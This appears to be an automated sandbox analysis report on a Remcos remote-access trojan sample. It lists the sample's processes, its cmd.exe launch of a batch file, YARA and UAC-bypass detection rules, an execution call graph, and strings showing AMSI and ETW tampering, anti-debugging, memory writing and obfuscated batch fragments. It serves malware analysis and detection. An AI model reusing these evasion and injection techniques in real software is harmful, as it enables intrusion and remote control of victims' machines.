                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:moderate
                                                            Has exited:false

                                                            General

                                                            Target ID:7
                                                            Start time:02:00:37
                                                            Start date:19/12/2024
                                                            Path:C:\Users\Public\Libraries\Emxwenem.PIF
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\Public\Libraries\Emxwenem.PIF"
                                                            Imagebase:0x400000
                                                            File size:1'362'944 bytes
                                                            MD5 hash:CCDCD04A0FFDE31366754018598EB02F
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:Borland Delphi
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 55%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:02:00:38
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                            Imagebase:0x410000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:02:00:38
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:02:00:38
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\SysWOW64\colorcpl.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\colorcpl.exe
                                                            Imagebase:0x970000
                                                            File size:86'528 bytes
                                                            MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1526792578.0000000000758000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:02:00:45
                                                            Start date:19/12/2024
                                                            Path:C:\Users\Public\Libraries\Emxwenem.PIF
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\Public\Libraries\Emxwenem.PIF"
                                                            Imagebase:0x400000
                                                            File size:1'362'944 bytes
                                                            MD5 hash:CCDCD04A0FFDE31366754018598EB02F
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:Borland Delphi
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:02:00:46
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                            Imagebase:0x410000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:02:00:46
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\SysWOW64\colorcpl.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\colorcpl.exe
                                                            Imagebase:0x970000
                                                            File size:86'528 bytes
                                                            MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1623286615.000000001ECB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:02:00:47
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:5.1%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:19.1%
                                                              Total number of Nodes:277
                                                              Total number of Limit Nodes:15
                                                              execution_graph 64944 2b84e88 64945 2b84e95 64944->64945 64949 2b84e9c 64944->64949 64953 2b84bdc SysAllocStringLen 64945->64953 64950 2b84bfc 64949->64950 64951 2b84c08 64950->64951 64952 2b84c02 SysFreeString 64950->64952 64952->64951 64953->64949 64954 2b81c6c 64955 2b81c7c 64954->64955 64956 2b81d04 64954->64956 64958 2b81c89 64955->64958 64959 2b81cc0 64955->64959 64957 2b81d0d 64956->64957 64963 2b81f58 64956->64963 64966 2b81e24 64957->64966 64969 2b81d25 64957->64969 64961 2b81c94 64958->64961 65002 2b81724 64958->65002 64960 2b81724 10 API calls 64959->64960 64984 2b81cd7 64960->64984 64962 2b81fec 64963->64962 64964 2b81f68 64963->64964 64965 2b81fac 64963->64965 64971 2b81724 10 API calls 64964->64971 64975 2b81fb2 64965->64975 64978 2b81724 10 API calls 64965->64978 64967 2b81e7c 64966->64967 64981 2b81e55 Sleep 64966->64981 64992 2b81e95 64966->64992 64972 2b81724 10 API calls 64967->64972 64967->64992 64968 2b81d2c 64969->64968 64973 2b81d48 64969->64973 64977 2b81dfc 64969->64977 64991 2b81f82 64971->64991 64988 2b81f2c 64972->64988 64982 2b81d79 Sleep 64973->64982 64994 2b81d9c 64973->64994 64974 2b81cfd 64976 2b81cb9 64979 2b81724 10 API calls 64977->64979 64993 2b81fc1 64978->64993 64996 2b81e05 64979->64996 64980 2b81fa7 64981->64967 64985 2b81e6f Sleep 64981->64985 64986 2b81d91 Sleep 64982->64986 64982->64994 64983 2b81ca1 64983->64976 65026 2b81a8c 64983->65026 64984->64974 64990 2b81a8c 8 API calls 64984->64990 64985->64966 64986->64973 64988->64992 64995 2b81a8c 8 API calls 64988->64995 64989 2b81e1d 64990->64974 64991->64980 64997 2b81a8c 8 API calls 64991->64997 64993->64980 64998 2b81a8c 8 API calls 64993->64998 64999 2b81f50 64995->64999 64996->64989 65000 2b81a8c 8 API calls 64996->65000 64997->64980 65001 2b81fe4 64998->65001 65000->64989 65003 2b81968 65002->65003 65012 2b8173c 65002->65012 65004 2b81a80 65003->65004 65005 2b81938 65003->65005 65006 2b81a89 65004->65006 65007 2b81684 VirtualAlloc 65004->65007 65008 2b81947 Sleep 65005->65008 65011 2b81986 65005->65011 65006->64983 65013 2b816bf 65007->65013 65014 2b816af 65007->65014 65008->65011 65015 2b8195d Sleep 65008->65015 65009 2b8174e 65010 2b8175d 65009->65010 65018 2b8182c 65009->65018 65020 2b8180a Sleep 65009->65020 65010->64983 65021 2b815cc VirtualAlloc 65011->65021 65023 2b819a4 65011->65023 65012->65009 65016 2b817cb Sleep 65012->65016 65013->64983 65043 2b81644 65014->65043 65015->65005 65016->65009 65019 2b817e4 Sleep 65016->65019 65025 2b81838 65018->65025 65049 2b815cc 65018->65049 65019->65012 65020->65018 65022 2b81820 Sleep 65020->65022 65021->65023 65022->65009 65023->64983 65025->64983 65027 2b81b6c 65026->65027 65028 2b81aa1 65026->65028 65029 2b816e8 65027->65029 65030 2b81aa7 65027->65030 65028->65030 65033 2b81b13 Sleep 65028->65033 65032 2b81c66 65029->65032 65036 2b81644 2 API calls 65029->65036 65031 2b81ab0 65030->65031 65035 2b81b4b Sleep 65030->65035 65039 2b81b81 65030->65039 65031->64976 65032->64976 65033->65030 65034 2b81b2d Sleep 65033->65034 65034->65028 65037 2b81b61 Sleep 65035->65037 65035->65039 65038 2b816f5 VirtualFree 65036->65038 65037->65030 65040 2b8170d 65038->65040 65041 2b81c00 VirtualFree 65039->65041 65042 2b81ba4 65039->65042 65040->64976 65041->64976 65042->64976 65044 2b81681 65043->65044 65045 2b8164d 65043->65045 65044->65013 65045->65044 65046 2b8164f Sleep 65045->65046 65047 2b81664 65046->65047 65047->65044 65048 2b81668 Sleep 65047->65048 65048->65045 65053 2b81560 65049->65053 65051 2b815d4 VirtualAlloc 65052 2b815eb 65051->65052 65052->65025 65054 2b81500 65053->65054 65054->65051 65055 2bac2fc 65065 2b86518 65055->65065 65059 2bac32a 65070 2babb50 timeSetEvent 65059->65070 65061 2bac334 65062 2bac342 GetMessageA 65061->65062 65063 2bac352 65062->65063 65064 2bac336 TranslateMessage DispatchMessageA 65062->65064 65064->65062 65066 2b86523 65065->65066 65071 2b84168 65066->65071 65069 2b8427c SysAllocStringLen SysFreeString SysReAllocStringLen 65069->65059 65070->65061 65072 2b841ae 65071->65072 65073 2b843b8 65072->65073 65074 2b84227 65072->65074 65077 2b843e9 65073->65077 65081 2b843fa 65073->65081 65085 2b84100 65074->65085 65090 2b8432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 65077->65090 65079 2b843f3 65079->65081 65080 2b8443f FreeLibrary 65080->65081 65081->65080 65082 2b84463 65081->65082 65083 2b8446c 65082->65083 65084 2b84472 ExitProcess 65082->65084 65083->65084 65086 2b84110 65085->65086 65087 2b84143 65085->65087 65086->65087 65088 2b815cc VirtualAlloc 65086->65088 65091 2b85814 65086->65091 65087->65069 65088->65086 65090->65079 65092 2b85824 GetModuleFileNameA 65091->65092 65094 2b85840 65091->65094 65095 2b85a78 GetModuleFileNameA RegOpenKeyExA 65092->65095 65094->65086 65096 2b85afb 65095->65096 65097 2b85abb RegOpenKeyExA 65095->65097 65113 2b858b4 12 API calls 65096->65113 65097->65096 65098 2b85ad9 RegOpenKeyExA 65097->65098 65098->65096 65101 2b85b84 lstrcpynA GetThreadLocale GetLocaleInfoA 65098->65101 65100 2b85b20 RegQueryValueExA 65102 2b85b40 RegQueryValueExA 65100->65102 65103 2b85b5e RegCloseKey 65100->65103 65104 2b85bbb 65101->65104 65105 2b85c9e 65101->65105 65102->65103 65103->65094 65104->65105 65107 2b85bcb lstrlenA 65104->65107 65105->65094 65108 2b85be3 65107->65108 65108->65105 65109 2b85c08 lstrcpynA LoadLibraryExA 65108->65109 65110 2b85c30 65108->65110 65109->65110 65110->65105 65111 2b85c3a lstrcpynA LoadLibraryExA 65110->65111 65111->65105 65112 2b85c6c lstrcpynA LoadLibraryExA 65111->65112 65112->65105 65113->65100 65114 2ba67c4 65931 2b8480c 65114->65931 65932 2b8481d 65931->65932 65933 2b8485a 65932->65933 65934 2b84843 65932->65934 65949 2b84570 65933->65949 65940 2b84b78 65934->65940 65937 2b84850 65938 2b8488b 65937->65938 65954 2b84500 65937->65954 65941 2b84b85 65940->65941 65948 2b84bb5 65940->65948 65942 2b84bae 65941->65942 65945 2b84b91 65941->65945 65946 2b84570 11 API calls 65942->65946 65944 2b84b9f 65944->65937 65960 2b82c44 11 API calls 65945->65960 65946->65948 65961 2b844ac 65948->65961 65950 2b84598 65949->65950 65951 2b84574 65949->65951 65950->65937 65966 2b82c10 11 API calls 65951->65966 65953 2b84581 65953->65937 65955 2b84504 65954->65955 65958 2b84514 65954->65958 65957 2b84570 11 API calls 65955->65957 65955->65958 65956 2b84542 65956->65938 65957->65958 65958->65956 65967 2b82c2c 11 API calls 65958->65967 65960->65944 65962 2b844cd 65961->65962 65963 2b844b2 65961->65963 65962->65944 65963->65962 65965 2b82c2c 11 API calls 65963->65965 65965->65962 65966->65953 65967->65956 65968 2babb44 65971 2b9ec74 65968->65971 65972 2b9ec7c 65971->65972 65972->65972 69132 2b9870c LoadLibraryW 65972->69132 65974 2b9ec9e 69137 2b82ee0 QueryPerformanceCounter 65974->69137 65976 2b9eca3 65977 2b9ecad InetIsOffline 65976->65977 65978 2b9ecc8 65977->65978 65979 2b9ecb7 65977->65979 65981 2b84500 11 API calls 65978->65981 65980 2b84500 11 API calls 65979->65980 65982 2b9ecc6 65980->65982 65981->65982 65983 2b8480c 11 API calls 65982->65983 65984 2b9ecf5 65983->65984 65985 2b9ecfd 65984->65985 69140 2b84798 65985->69140 65987 2b9ed20 65988 2b9ed28 65987->65988 65989 2b9ed32 65988->65989 69155 2b98824 65989->69155 65992 2b8480c 11 API calls 65993 2b9ed59 65992->65993 65994 2b9ed61 65993->65994 65995 2b84798 11 API calls 65994->65995 65996 2b9ed84 65995->65996 65997 2b9ed8c 65996->65997 69168 2b846a4 65997->69168 69170 2b980c8 69132->69170 69134 2b98745 69181 2b97d00 69134->69181 69138 2b82ef8 GetTickCount 69137->69138 69139 2b82eed 69137->69139 69138->65976 69139->65976 69141 2b8479c 69140->69141 69142 2b847fd 69140->69142 69145 2b847a4 69141->69145 69146 2b84500 69141->69146 69143 2b84542 69143->65987 69144 2b847b3 69149 2b84570 11 API calls 69144->69149 69145->69142 69145->69144 69147 2b84500 11 API calls 69145->69147 69148 2b84570 11 API calls 69146->69148 69150 2b84514 69146->69150 69147->69144 69148->69150 69152 2b847cd 69149->69152 69150->69143 69218 2b82c2c 11 API calls 69150->69218 69153 2b84500 11 API calls 69152->69153 69154 2b847f9 69153->69154 69154->65987 69156 2b98838 69155->69156 69157 2b98857 LoadLibraryA 69156->69157 69158 2b98867 69157->69158 69159 2b98020 17 API calls 69158->69159 69160 2b9886d 69159->69160 69161 2b980c8 15 API calls 69160->69161 69162 2b98886 69161->69162 69163 2b97d00 18 API calls 69162->69163 69164 2b988e5 FreeLibrary 69163->69164 69165 2b988fd 69164->69165 69166 2b844d0 11 API calls 69165->69166 69167 2b9890a 69166->69167 69167->65992 69169 2b846aa 69168->69169 69171 2b84500 11 API calls 69170->69171 69172 2b980ed 69171->69172 69195 2b97914 69172->69195 69175 2b84798 11 API calls 69176 2b98107 69175->69176 69177 2b9810f GetModuleHandleW GetProcAddress GetProcAddress 69176->69177 69178 2b98142 69177->69178 69201 2b844d0 69178->69201 69182 2b84500 11 API calls 69181->69182 69183 2b97d25 69182->69183 69184 2b97914 12 API calls 69183->69184 69185 2b97d32 69184->69185 69186 2b84798 11 API calls 69185->69186 69187 2b97d42 69186->69187 69207 2b98020 69187->69207 69190 2b980c8 15 API calls 69191 2b97d5b NtWriteVirtualMemory 69190->69191 69192 2b97d87 69191->69192 69193 2b844d0 11 API calls 69192->69193 69194 2b97d94 FreeLibrary 69193->69194 69194->65974 69196 2b97925 69195->69196 69197 2b84b78 11 API calls 69196->69197 69199 2b97935 69197->69199 69198 2b979a1 69198->69175 69199->69198 69205 2b8ba44 CharNextA 69199->69205 69203 2b844d6 69201->69203 69202 2b844fc 69202->69134 69203->69202 69206 2b82c2c 11 API calls 69203->69206 69205->69199 69206->69203 69208 2b84500 11 API calls 69207->69208 69209 2b98043 69208->69209 69210 2b97914 12 API calls 69209->69210 69211 2b98050 69210->69211 69212 2b98058 GetModuleHandleA 69211->69212 69213 2b980c8 15 API calls 69212->69213 69214 2b98069 GetModuleHandleA 69213->69214 69215 2b98087 69214->69215 69216 2b844ac 11 API calls 69215->69216 69217 2b97d55 69216->69217 69217->69190 69218->69143

                                                              Executed Functions

                                                              Function 02B9EC74 Relevance: 245.0, APIs: 11, Strings: 123, Instructions: 10535filesleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InetIsOffline.URL(00000000,00000000,02BAAFA1,?,?,?,000002F7,00000000,00000000), ref: 02B9ECAE
                                                                • Part of subcall function 02B98824: LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858
                                                                • Part of subcall function 02B98824: FreeLibrary.KERNEL32(74FC0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74FC0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB
                                                                • Part of subcall function 02B9EB94: GetModuleHandleW.KERNEL32(KernelBase,?,02B9EF98,UacInitialize,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,Initialize), ref: 02B9EB9A
                                                                • Part of subcall function 02B9EB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B9EBAC
                                                                • Part of subcall function 02B9EBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B9EC00
                                                                • Part of subcall function 02B9EBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B9EC12
                                                                • Part of subcall function 02B9EBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B9EC29
                                                                • Part of subcall function 02B87E18: GetFileAttributesA.KERNEL32(00000000,?,02B9F8CC,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,UacScan,02BE137C,02BAAFD8,UacInitialize), ref: 02B87E23
                                                                • Part of subcall function 02B8C2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02CD58C8,?,02B9FBFE,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession), ref: 02B8C303
                                                                • Part of subcall function 02B9DBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DC80), ref: 02B9DBEB
                                                                • Part of subcall function 02B9DBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B9DC80), ref: 02B9DC1B
                                                                • Part of subcall function 02B9DBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B9DC30
                                                                • Part of subcall function 02B9DBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B9DC5C
                                                                • Part of subcall function 02B9DBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B9DC65
                                                                • Part of subcall function 02B87E3C: GetFileAttributesA.KERNEL32(00000000,?,02BA2A49,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,Initialize), ref: 02B87E47
                                                                • Part of subcall function 02B87FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02BA2BE7,OpenSession,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,Initialize,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8), ref: 02B87FDD
                                                                • Part of subcall function 02B9DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DB9E), ref: 02B9DB0B
                                                                • Part of subcall function 02B9DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B9DB45
                                                                • Part of subcall function 02B9DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B9DB72
                                                                • Part of subcall function 02B9DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B9DB7B
                                                                • Part of subcall function 02B987A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,UacScan), ref: 02B987B4
                                                                • Part of subcall function 02B987A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B987CE
                                                                • Part of subcall function 02B987A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize), ref: 02B9880A
                                                                • Part of subcall function 02B9870C: LoadLibraryW.KERNEL32(amsi), ref: 02B98715
                                                                • Part of subcall function 02B9870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B98774
                                                              • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,02BAB330), ref: 02BA49B7
                                                                • Part of subcall function 02B9DA44: RtlInitUnicodeString.NTDLL(?,?), ref: 02B9DA6C
                                                                • Part of subcall function 02B9DA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DABE), ref: 02B9DA82
                                                                • Part of subcall function 02B9DA44: NtDeleteFile.NTDLL(?), ref: 02B9DAA1
                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 02BA4BB7
                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 02BA4C0D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                              • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                              • API String ID: 3130226682-1898677207
                                                              • Opcode ID: 1aca352ba7916114f94992f6e217fc795b19021cdf83a67f387cccd150f077e1
                                                              • Instruction ID: 098ad59d5bc330fa4f5b6df91f75e883efe6ca7e42804aa58f6b28ca9d16d745
                                                              • Opcode Fuzzy Hash: 1aca352ba7916114f94992f6e217fc795b19021cdf83a67f387cccd150f077e1
                                                              • Instruction Fuzzy Hash: F4241875A5015A8FDB25FB64CC90ADE73B6BF89304F1044E6E10DEB254EA31AE86CF50
                                                              Function 02B85A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
